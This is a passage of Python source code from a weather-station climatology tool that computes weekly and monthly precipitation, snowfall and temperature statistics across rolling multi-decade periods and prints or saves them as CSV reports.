alltime["tminPROP"]["week_min"][0]: alltime["tminPROP"]["week_min"][1].append(y) elif mean(wk_tmin) < alltime["tminPROP"]["week_min"][0]: alltime["tminPROP"]["week_min"][0] = mean(wk_tmin) alltime["tminPROP"]["week_min"][1] = [] alltime["tminPROP"]["week_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(wk_prcp)) climo30yrs[c]["snow"].append(sum(wk_snow)) if sum(wk_prcp) == climo30yrs[c]["prcpPROP"]["week_max"][0]: climo30yrs[c]["prcpPROP"]["week_max"][1].append(y) elif sum(wk_prcp) > climo30yrs[c]["prcpPROP"]["week_max"][0]: climo30yrs[c]["prcpPROP"]["week_max"][0] = sum(wk_prcp) climo30yrs[c]["prcpPROP"]["week_max"][1] = [] climo30yrs[c]["prcpPROP"]["week_max"][1].append(y) if sum(wk_snow) == climo30yrs[c]["snowPROP"]["week_max"][0]: climo30yrs[c]["snowPROP"]["week_max"][1].append(y) elif sum(wk_snow) > climo30yrs[c]["snowPROP"]["week_max"][0]: climo30yrs[c]["snowPROP"]["week_max"][0] = sum(wk_snow) climo30yrs[c]["snowPROP"]["week_max"][1] = [] climo30yrs[c]["snowPROP"]["week_max"][1].append(y) if len(wk_tempAVGlist) > excludeweek_tavg: climo30yrs[c]["tempAVGlist"].append(round(mean(wk_tempAVGlist),1)) if round(mean(wk_tempAVGlist),1) == climo30yrs[c]["tavgPROP"]["week_max"][0]: climo30yrs[c]["tavgPROP"]["week_max"][1].append(y) elif round(mean(wk_tempAVGlist),1) > climo30yrs[c]["tavgPROP"]["week_max"][0]: climo30yrs[c]["tavgPROP"]["week_max"][0] = mean(wk_tempAVGlist) climo30yrs[c]["tavgPROP"]["week_max"][1] = [] climo30yrs[c]["tavgPROP"]["week_max"][1].append(y) if round(mean(wk_tempAVGlist),1) == climo30yrs[c]["tavgPROP"]["week_min"][0]: climo30yrs[c]["tavgPROP"]["week_min"][1].append(y) elif round(mean(wk_tempAVGlist),1) < climo30yrs[c]["tavgPROP"]["week_min"][0]: climo30yrs[c]["tavgPROP"]["week_min"][0] = round(mean(wk_tempAVGlist),1) climo30yrs[c]["tavgPROP"]["week_min"][1] = [] climo30yrs[c]["tavgPROP"]["week_min"][1].append(y) if len(wk_tmax) > excludeweek: if mean(wk_tmax) == climo30yrs[c]["tmaxPROP"]["week_max"][0]: climo30yrs[c]["tmaxPROP"]["week_max"][1].append(y) elif mean(wk_tmax) > climo30yrs[c]["tmaxPROP"]["week_max"][0]: climo30yrs[c]["tmaxPROP"]["week_max"][0] = mean(wk_tmax) climo30yrs[c]["tmaxPROP"]["week_max"][1] = [] climo30yrs[c]["tmaxPROP"]["week_max"][1].append(y) if mean(wk_tmax) == climo30yrs[c]["tmaxPROP"]["week_min"][0]: climo30yrs[c]["tmaxPROP"]["week_min"][1].append(y) elif mean(wk_tmax) < climo30yrs[c]["tmaxPROP"]["week_min"][0]: climo30yrs[c]["tmaxPROP"]["week_min"][0] = mean(wk_tmax) climo30yrs[c]["tmaxPROP"]["week_min"][1] = [] climo30yrs[c]["tmaxPROP"]["week_min"][1].append(y) if len(wk_tmin) > excludeweek: if mean(wk_tmin) == climo30yrs[c]["tminPROP"]["week_max"][0]: climo30yrs[c]["tminPROP"]["week_max"][1].append(y) elif mean(wk_tmin) > climo30yrs[c]["tminPROP"]["week_max"][0]: climo30yrs[c]["tminPROP"]["week_max"][0] = mean(wk_tmin) climo30yrs[c]["tminPROP"]["week_max"][1] = [] climo30yrs[c]["tminPROP"]["week_max"][1].append(y) if mean(wk_tmin) == climo30yrs[c]["tminPROP"]["week_min"][0]: climo30yrs[c]["tminPROP"]["week_min"][1].append(y) elif mean(wk_tmin) < climo30yrs[c]["tminPROP"]["week_min"][0]: climo30yrs[c]["tminPROP"]["week_min"][0] = mean(wk_tmin) climo30yrs[c]["tminPROP"]["week_min"][1] = [] climo30yrs[c]["tminPROP"]["week_min"][1].append(y) wkstart = datetime.date(1999,m,d) - datetime.timedelta(days=3) currday = wkstart # PRINT REPORT print("--------------------------------------------------") print("Climatology Report for the Week of {:%b} {:%d} - {:%b} {:%d}".format(wkstart,wkstart,wkend,wkend)) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("--------------------------------------------------") print("\nPart 1: Precipitation Stats") print("{:▒^9} {:▒^11} {:▒^6} {:▒^12} {:▒^11} {:▒^6} {:▒^12}".format("Years","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^11} {:▒^6} {:▒^12} {:▒^11} {:▒^6} {:▒^12}".format("","DAYS","AVG", "MAX","DAYS","AVG", "MAX")) # Y PD PA PM SD SA SM print("{:-^9} {:-^11} {:-^6} {:-^12} {:-^11} {:-^6} {:-^12}".format("","","","","","","")) print("{:^9} {:4}:{:>5}% {:^6.2f} {:>5.2f}, {:^5} {:4}:{:>5}% {:^6.1f} {:>5.1f}, {:^5}".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), round(mean(alltime["prcp"]),2), round(alltime["prcpPROP"]["week_max"][0],2), alltime["prcpPROP"]["week_max"][1][0] if len(alltime["prcpPROP"]["week_max"][1]) == 1 else len(alltime["prcpPROP"]["week_max"][1]), alltime["snowPROP"]["days"], round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1), round(mean(alltime["snow"]),1), round(alltime["snowPROP"]["week_max"][0],2), alltime["snowPROP"]["week_max"][1][0] if len(alltime["snowPROP"]["week_max"][1]) == 1 else len(alltime["snowPROP"]["week_max"][1]))) for c in climo30yrs: try: print("{:^9} {:4}:{:>5}% {:^6.2f} {:>5.2f}, {:^5} {:4}:{:>5}% {:^6.1f} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["week_max"][0],2), climo30yrs[c]["prcpPROP"]["week_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["week_max"][1]), climo30yrs[c]["snowPROP"]["days"], round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1), round(mean(climo30yrs[c]["snow"]),1), round(climo30yrs[c]["snowPROP"]["week_max"][0],2), climo30yrs[c]["snowPROP"]["week_max"][1][0] if len(climo30yrs[c]["snowPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["week_max"][1]))) except: pass print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["week_max"][0],1), alltime["tavgPROP"]["week_max"][1][0] if len(alltime["tavgPROP"]["week_max"][1]) == 1 else len(alltime["tavgPROP"]["week_max"][1]), round(alltime["tavgPROP"]["week_min"][0],1), alltime["tavgPROP"]["week_min"][1][0] if len(alltime["tavgPROP"]["week_min"][1]) == 1 else len(alltime["tavgPROP"]["week_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["week_max"][0],1), alltime["tmaxPROP"]["week_max"][1][0] if len(alltime["tmaxPROP"]["week_max"][1]) == 1 else len(alltime["tmaxPROP"]["week_max"][1]), round(alltime["tmaxPROP"]["week_min"][0],1), alltime["tmaxPROP"]["week_min"][1][0] if len(alltime["tmaxPROP"]["week_min"][1]) == 1 else len(alltime["tmaxPROP"]["week_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["week_max"][0],1), alltime["tminPROP"]["week_max"][1][0] if len(alltime["tminPROP"]["week_max"][1]) == 1 else len(alltime["tminPROP"]["week_max"][1]), round(alltime["tminPROP"]["week_min"][0],1), alltime["tminPROP"]["week_min"][1][0] if len(alltime["tminPROP"]["week_min"][1]) == 1 else len(alltime["tminPROP"]["week_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["week_max"][0],1), climo30yrs[c]["tavgPROP"]["week_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["week_max"][1]), round(climo30yrs[c]["tavgPROP"]["week_min"][0],1), climo30yrs[c]["tavgPROP"]["week_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["week_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["week_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["week_max"][0],1), climo30yrs[c]["tmaxPROP"]["week_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["week_max"][1]), round(climo30yrs[c]["tmaxPROP"]["week_min"][0],1), climo30yrs[c]["tmaxPROP"]["week_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["week_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["week_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["week_max"][0],1), climo30yrs[c]["tminPROP"]["week_max"][1][0] if len(climo30yrs[c]["tminPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["week_max"][1]), round(climo30yrs[c]["tminPROP"]["week_min"][0],1), climo30yrs[c]["tminPROP"]["week_min"][1][0] if len(climo30yrs[c]["tminPROP"]["week_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["week_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "weekReport_centered_" + str(calendar.month_abbr[m]) + str(d) + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({}-{} thru {}-{})".format(wkstart.month,wkstart.day,wkend.month,wkend.day),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tempAVGlist_ind"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmin"]),1))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tempAVGlist_ind"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmin"]),1))); w.write("\n") print("*** csv output successful ***") def monthReport(m,climatology=30,increment=5,output=False): """Detailed Climatological Report for a given month Args (Required): m: month (int) Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: monthReport(10) -> Returns a 30-yr, 5-yr incremented climatological report for the month of October. monthReport(12,climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for December. monthReport(3,climatology=20,increment=1,output=True) -> Returns a 1-yr incremented, 20yr climatology report for March and outputs a CSV. """ valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"month_max_days":[-1,[]],"month_min_days":[999,[]],"month_max":[-1,[]],"month_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"month_max_days":[-1,[]],"month_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmax": [],"tmaxPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmin": [],"tminPROP":{"month_max":[-999,[]],"month_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"month_max_days":[-1,[]],"month_min_days":[999,[]],"month_max":[-1,[]],"month_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"month_max_days":[-1,[]],"month_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmax": [],"tmaxPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmin": [],"tminPROP":{"month_max":[-999,[]],"month_min":[999,[]]}} # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' for y in valid_yrs: if y in clmt and m in clmt[y]: alltime["total_days"] += clmt[y][m]["recordqty"] # PRCP alltime["prcp"].append(sum(clmt[y][m]["prcp"])) alltime["prcpPROP"]["days"] += clmt[y][m]["prcpDAYS"] if clmt[y][m]["prcpDAYS"] == alltime["prcpPROP"]["month_max_days"][0]: alltime["prcpPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] > alltime["prcpPROP"]["month_max_days"][0]: alltime["prcpPROP"]["month_max_days"][0] = clmt[y][m]["prcpDAYS"] alltime["prcpPROP"]["month_max_days"][1] = [] alltime["prcpPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == alltime["prcpPROP"]["month_max"][0]: alltime["prcpPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["prcp"]) > alltime["prcpPROP"]["month_max"][0]: alltime["prcpPROP"]["month_max"][0] = sum(clmt[y][m]["prcp"]) alltime["prcpPROP"]["month_max"][1] = [] alltime["prcpPROP"]["month_max"][1].append(y) if clmt[y][m]["recordqty"] > excludemonth: if clmt[y][m]["prcpDAYS"] == alltime["prcpPROP"]["month_min_days"][0]: alltime["prcpPROP"]["month_min_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] < alltime["prcpPROP"]["month_min_days"][0]: alltime["prcpPROP"]["month_min_days"][0] = clmt[y][m]["prcpDAYS"] alltime["prcpPROP"]["month_min_days"][1] = [] alltime["prcpPROP"]["month_min_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == alltime["prcpPROP"]["month_min"][0]: alltime["prcpPROP"]["month_min"][1].append(y) elif sum(clmt[y][m]["prcp"]) < alltime["prcpPROP"]["month_min"][0]: alltime["prcpPROP"]["month_min"][0] = sum(clmt[y][m]["prcp"]) alltime["prcpPROP"]["month_min"][1] = [] alltime["prcpPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(clmt[y][m]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += clmt[y][m]["prcpDAYS"] climo30yrs[c]["total_days"] += clmt[y][m]["recordqty"] if clmt[y][m]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["month_max_days"][0]: climo30yrs[c]["prcpPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["month_max_days"][0]: climo30yrs[c]["prcpPROP"]["month_max_days"][0] = clmt[y][m]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["month_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == climo30yrs[c]["prcpPROP"]["month_max"][0]: climo30yrs[c]["prcpPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["prcp"]) > climo30yrs[c]["prcpPROP"]["month_max"][0]: climo30yrs[c]["prcpPROP"]["month_max"][0] = sum(clmt[y][m]["prcp"]) climo30yrs[c]["prcpPROP"]["month_max"][1] = [] climo30yrs[c]["prcpPROP"]["month_max"][1].append(y) if clmt[y][m]["recordqty"] > excludemonth: if clmt[y][m]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["month_min_days"][0]: climo30yrs[c]["prcpPROP"]["month_min_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["month_min_days"][0]: climo30yrs[c]["prcpPROP"]["month_min_days"][0] = clmt[y][m]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["month_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["month_min_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == climo30yrs[c]["prcpPROP"]["month_min"][0]: climo30yrs[c]["prcpPROP"]["month_min"][1].append(y) elif sum(clmt[y][m]["prcp"]) < climo30yrs[c]["prcpPROP"]["month_min"][0]: climo30yrs[c]["prcpPROP"]["month_min"][0] = sum(clmt[y][m]["prcp"]) climo30yrs[c]["prcpPROP"]["month_min"][1] = [] climo30yrs[c]["prcpPROP"]["month_min"][1].append(y) # SNOW alltime["snow"].append(sum(clmt[y][m]["snow"])) alltime["snowPROP"]["days"] += clmt[y][m]["snowDAYS"] if clmt[y][m]["snowDAYS"] == alltime["snowPROP"]["month_max_days"][0]: alltime["snowPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["snowDAYS"] > alltime["snowPROP"]["month_max_days"][0]: alltime["snowPROP"]["month_max_days"][0] = clmt[y][m]["snowDAYS"] alltime["snowPROP"]["month_max_days"][1] = [] alltime["snowPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["snow"]) == alltime["snowPROP"]["month_max"][0]: alltime["snowPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["snow"]) > alltime["snowPROP"]["month_max"][0]: alltime["snowPROP"]["month_max"][0] = sum(clmt[y][m]["snow"]) alltime["snowPROP"]["month_max"][1] = [] alltime["snowPROP"]["month_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(clmt[y][m]["snow"])) climo30yrs[c]["snowPROP"]["days"] += clmt[y][m]["snowDAYS"] if clmt[y][m]["snowDAYS"] == climo30yrs[c]["snowPROP"]["month_max_days"][0]: climo30yrs[c]["snowPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["snowDAYS"] > climo30yrs[c]["snowPROP"]["month_max_days"][0]: climo30yrs[c]["snowPROP"]["month_max_days"][0] = clmt[y][m]["snowDAYS"] climo30yrs[c]["snowPROP"]["month_max_days"][1] = [] climo30yrs[c]["snowPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["snow"]) == climo30yrs[c]["snowPROP"]["month_max"][0]: climo30yrs[c]["snowPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["snow"]) > climo30yrs[c]["snowPROP"]["month_max"][0]: climo30yrs[c]["snowPROP"]["month_max"][0] = sum(clmt[y][m]["snow"]) climo30yrs[c]["snowPROP"]["month_max"][1] = [] climo30yrs[c]["snowPROP"]["month_max"][1].append(y) for x in clmt[y][m]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(clmt[y][m]["tempAVGlist"]) > excludemonth_tavg: alltime["tempAVGlist"].append(mean(clmt[y][m]["tempAVGlist"])) if mean(clmt[y][m]["tempAVGlist"]) == alltime["tavgPROP"]["month_max"][0]: alltime["tavgPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) > alltime["tavgPROP"]["month_max"][0]: alltime["tavgPROP"]["month_max"][0] = mean(clmt[y][m]["tempAVGlist"]) alltime["tavgPROP"]["month_max"][1] = [] alltime["tavgPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tempAVGlist"]) == alltime["tavgPROP"]["month_min"][0]: alltime["tavgPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) < alltime["tavgPROP"]["month_min"][0]: alltime["tavgPROP"]["month_min"][0] = mean(clmt[y][m]["tempAVGlist"]) alltime["tavgPROP"]["month_min"][1] = [] alltime["tavgPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y][m]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(clmt[y][m]["tempAVGlist"]) > excludemonth_tavg: climo30yrs[c]["tempAVGlist"].append(mean(clmt[y][m]["tempAVGlist"])) if mean(clmt[y][m]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["month_max"][0]: climo30yrs[c]["tavgPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["month_max"][0]: climo30yrs[c]["tavgPROP"]["month_max"][0] = mean(clmt[y][m]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["month_max"][1] = [] climo30yrs[c]["tavgPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["month_min"][0]: climo30yrs[c]["tavgPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["month_min"][0]: climo30yrs[c]["tavgPROP"]["month_min"][0] = mean(clmt[y][m]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["month_min"][1] = [] climo30yrs[c]["tavgPROP"]["month_min"][1].append(y) # TMAX for x in clmt[y][m]["tmax"]: alltime["tmax"].append(x) if len(clmt[y][m]["tmax"]) > excludemonth: if mean(clmt[y][m]["tmax"]) == alltime["tmaxPROP"]["month_max"][0]: alltime["tmaxPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmax"]) > alltime["tmaxPROP"]["month_max"][0]: alltime["tmaxPROP"]["month_max"][0] = mean(clmt[y][m]["tmax"]) alltime["tmaxPROP"]["month_max"][1] = [] alltime["tmaxPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmax"]) == alltime["tmaxPROP"]["month_min"][0]: alltime["tmaxPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmax"]) < alltime["tmaxPROP"]["month_min"][0]: alltime["tmaxPROP"]["month_min"][0] = mean(clmt[y][m]["tmax"]) alltime["tmaxPROP"]["month_min"][1] = [] alltime["tmaxPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y][m]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(clmt[y][m]["tmax"]) > excludemonth: if mean(clmt[y][m]["tmax"]) == climo30yrs[c]["tmaxPROP"]["month_max"][0]: climo30yrs[c]["tmaxPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmax"]) > climo30yrs[c]["tmaxPROP"]["month_max"][0]: climo30yrs[c]["tmaxPROP"]["month_max"][0] = mean(clmt[y][m]["tmax"]) climo30yrs[c]["tmaxPROP"]["month_max"][1] = [] climo30yrs[c]["tmaxPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmax"]) == climo30yrs[c]["tmaxPROP"]["month_min"][0]: climo30yrs[c]["tmaxPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmax"]) < climo30yrs[c]["tmaxPROP"]["month_min"][0]: climo30yrs[c]["tmaxPROP"]["month_min"][0] = mean(clmt[y][m]["tmax"]) climo30yrs[c]["tmaxPROP"]["month_min"][1] = [] climo30yrs[c]["tmaxPROP"]["month_min"][1].append(y) # TMIN for x in clmt[y][m]["tmin"]: alltime["tmin"].append(x) if len(clmt[y][m]["tmin"]) > excludemonth: if mean(clmt[y][m]["tmin"]) == alltime["tminPROP"]["month_max"][0]: alltime["tminPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmin"]) > alltime["tminPROP"]["month_max"][0]: alltime["tminPROP"]["month_max"][0] = mean(clmt[y][m]["tmin"]) alltime["tminPROP"]["month_max"][1] = [] alltime["tminPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmin"]) == alltime["tminPROP"]["month_min"][0]: alltime["tminPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmin"]) < alltime["tminPROP"]["month_min"][0]: alltime["tminPROP"]["month_min"][0] = mean(clmt[y][m]["tmin"]) alltime["tminPROP"]["month_min"][1] = [] alltime["tminPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y][m]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(clmt[y][m]["tmin"]) > excludemonth: if mean(clmt[y][m]["tmin"]) == climo30yrs[c]["tminPROP"]["month_max"][0]: climo30yrs[c]["tminPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmin"]) > climo30yrs[c]["tminPROP"]["month_max"][0]: climo30yrs[c]["tminPROP"]["month_max"][0] = mean(clmt[y][m]["tmin"]) climo30yrs[c]["tminPROP"]["month_max"][1] = [] 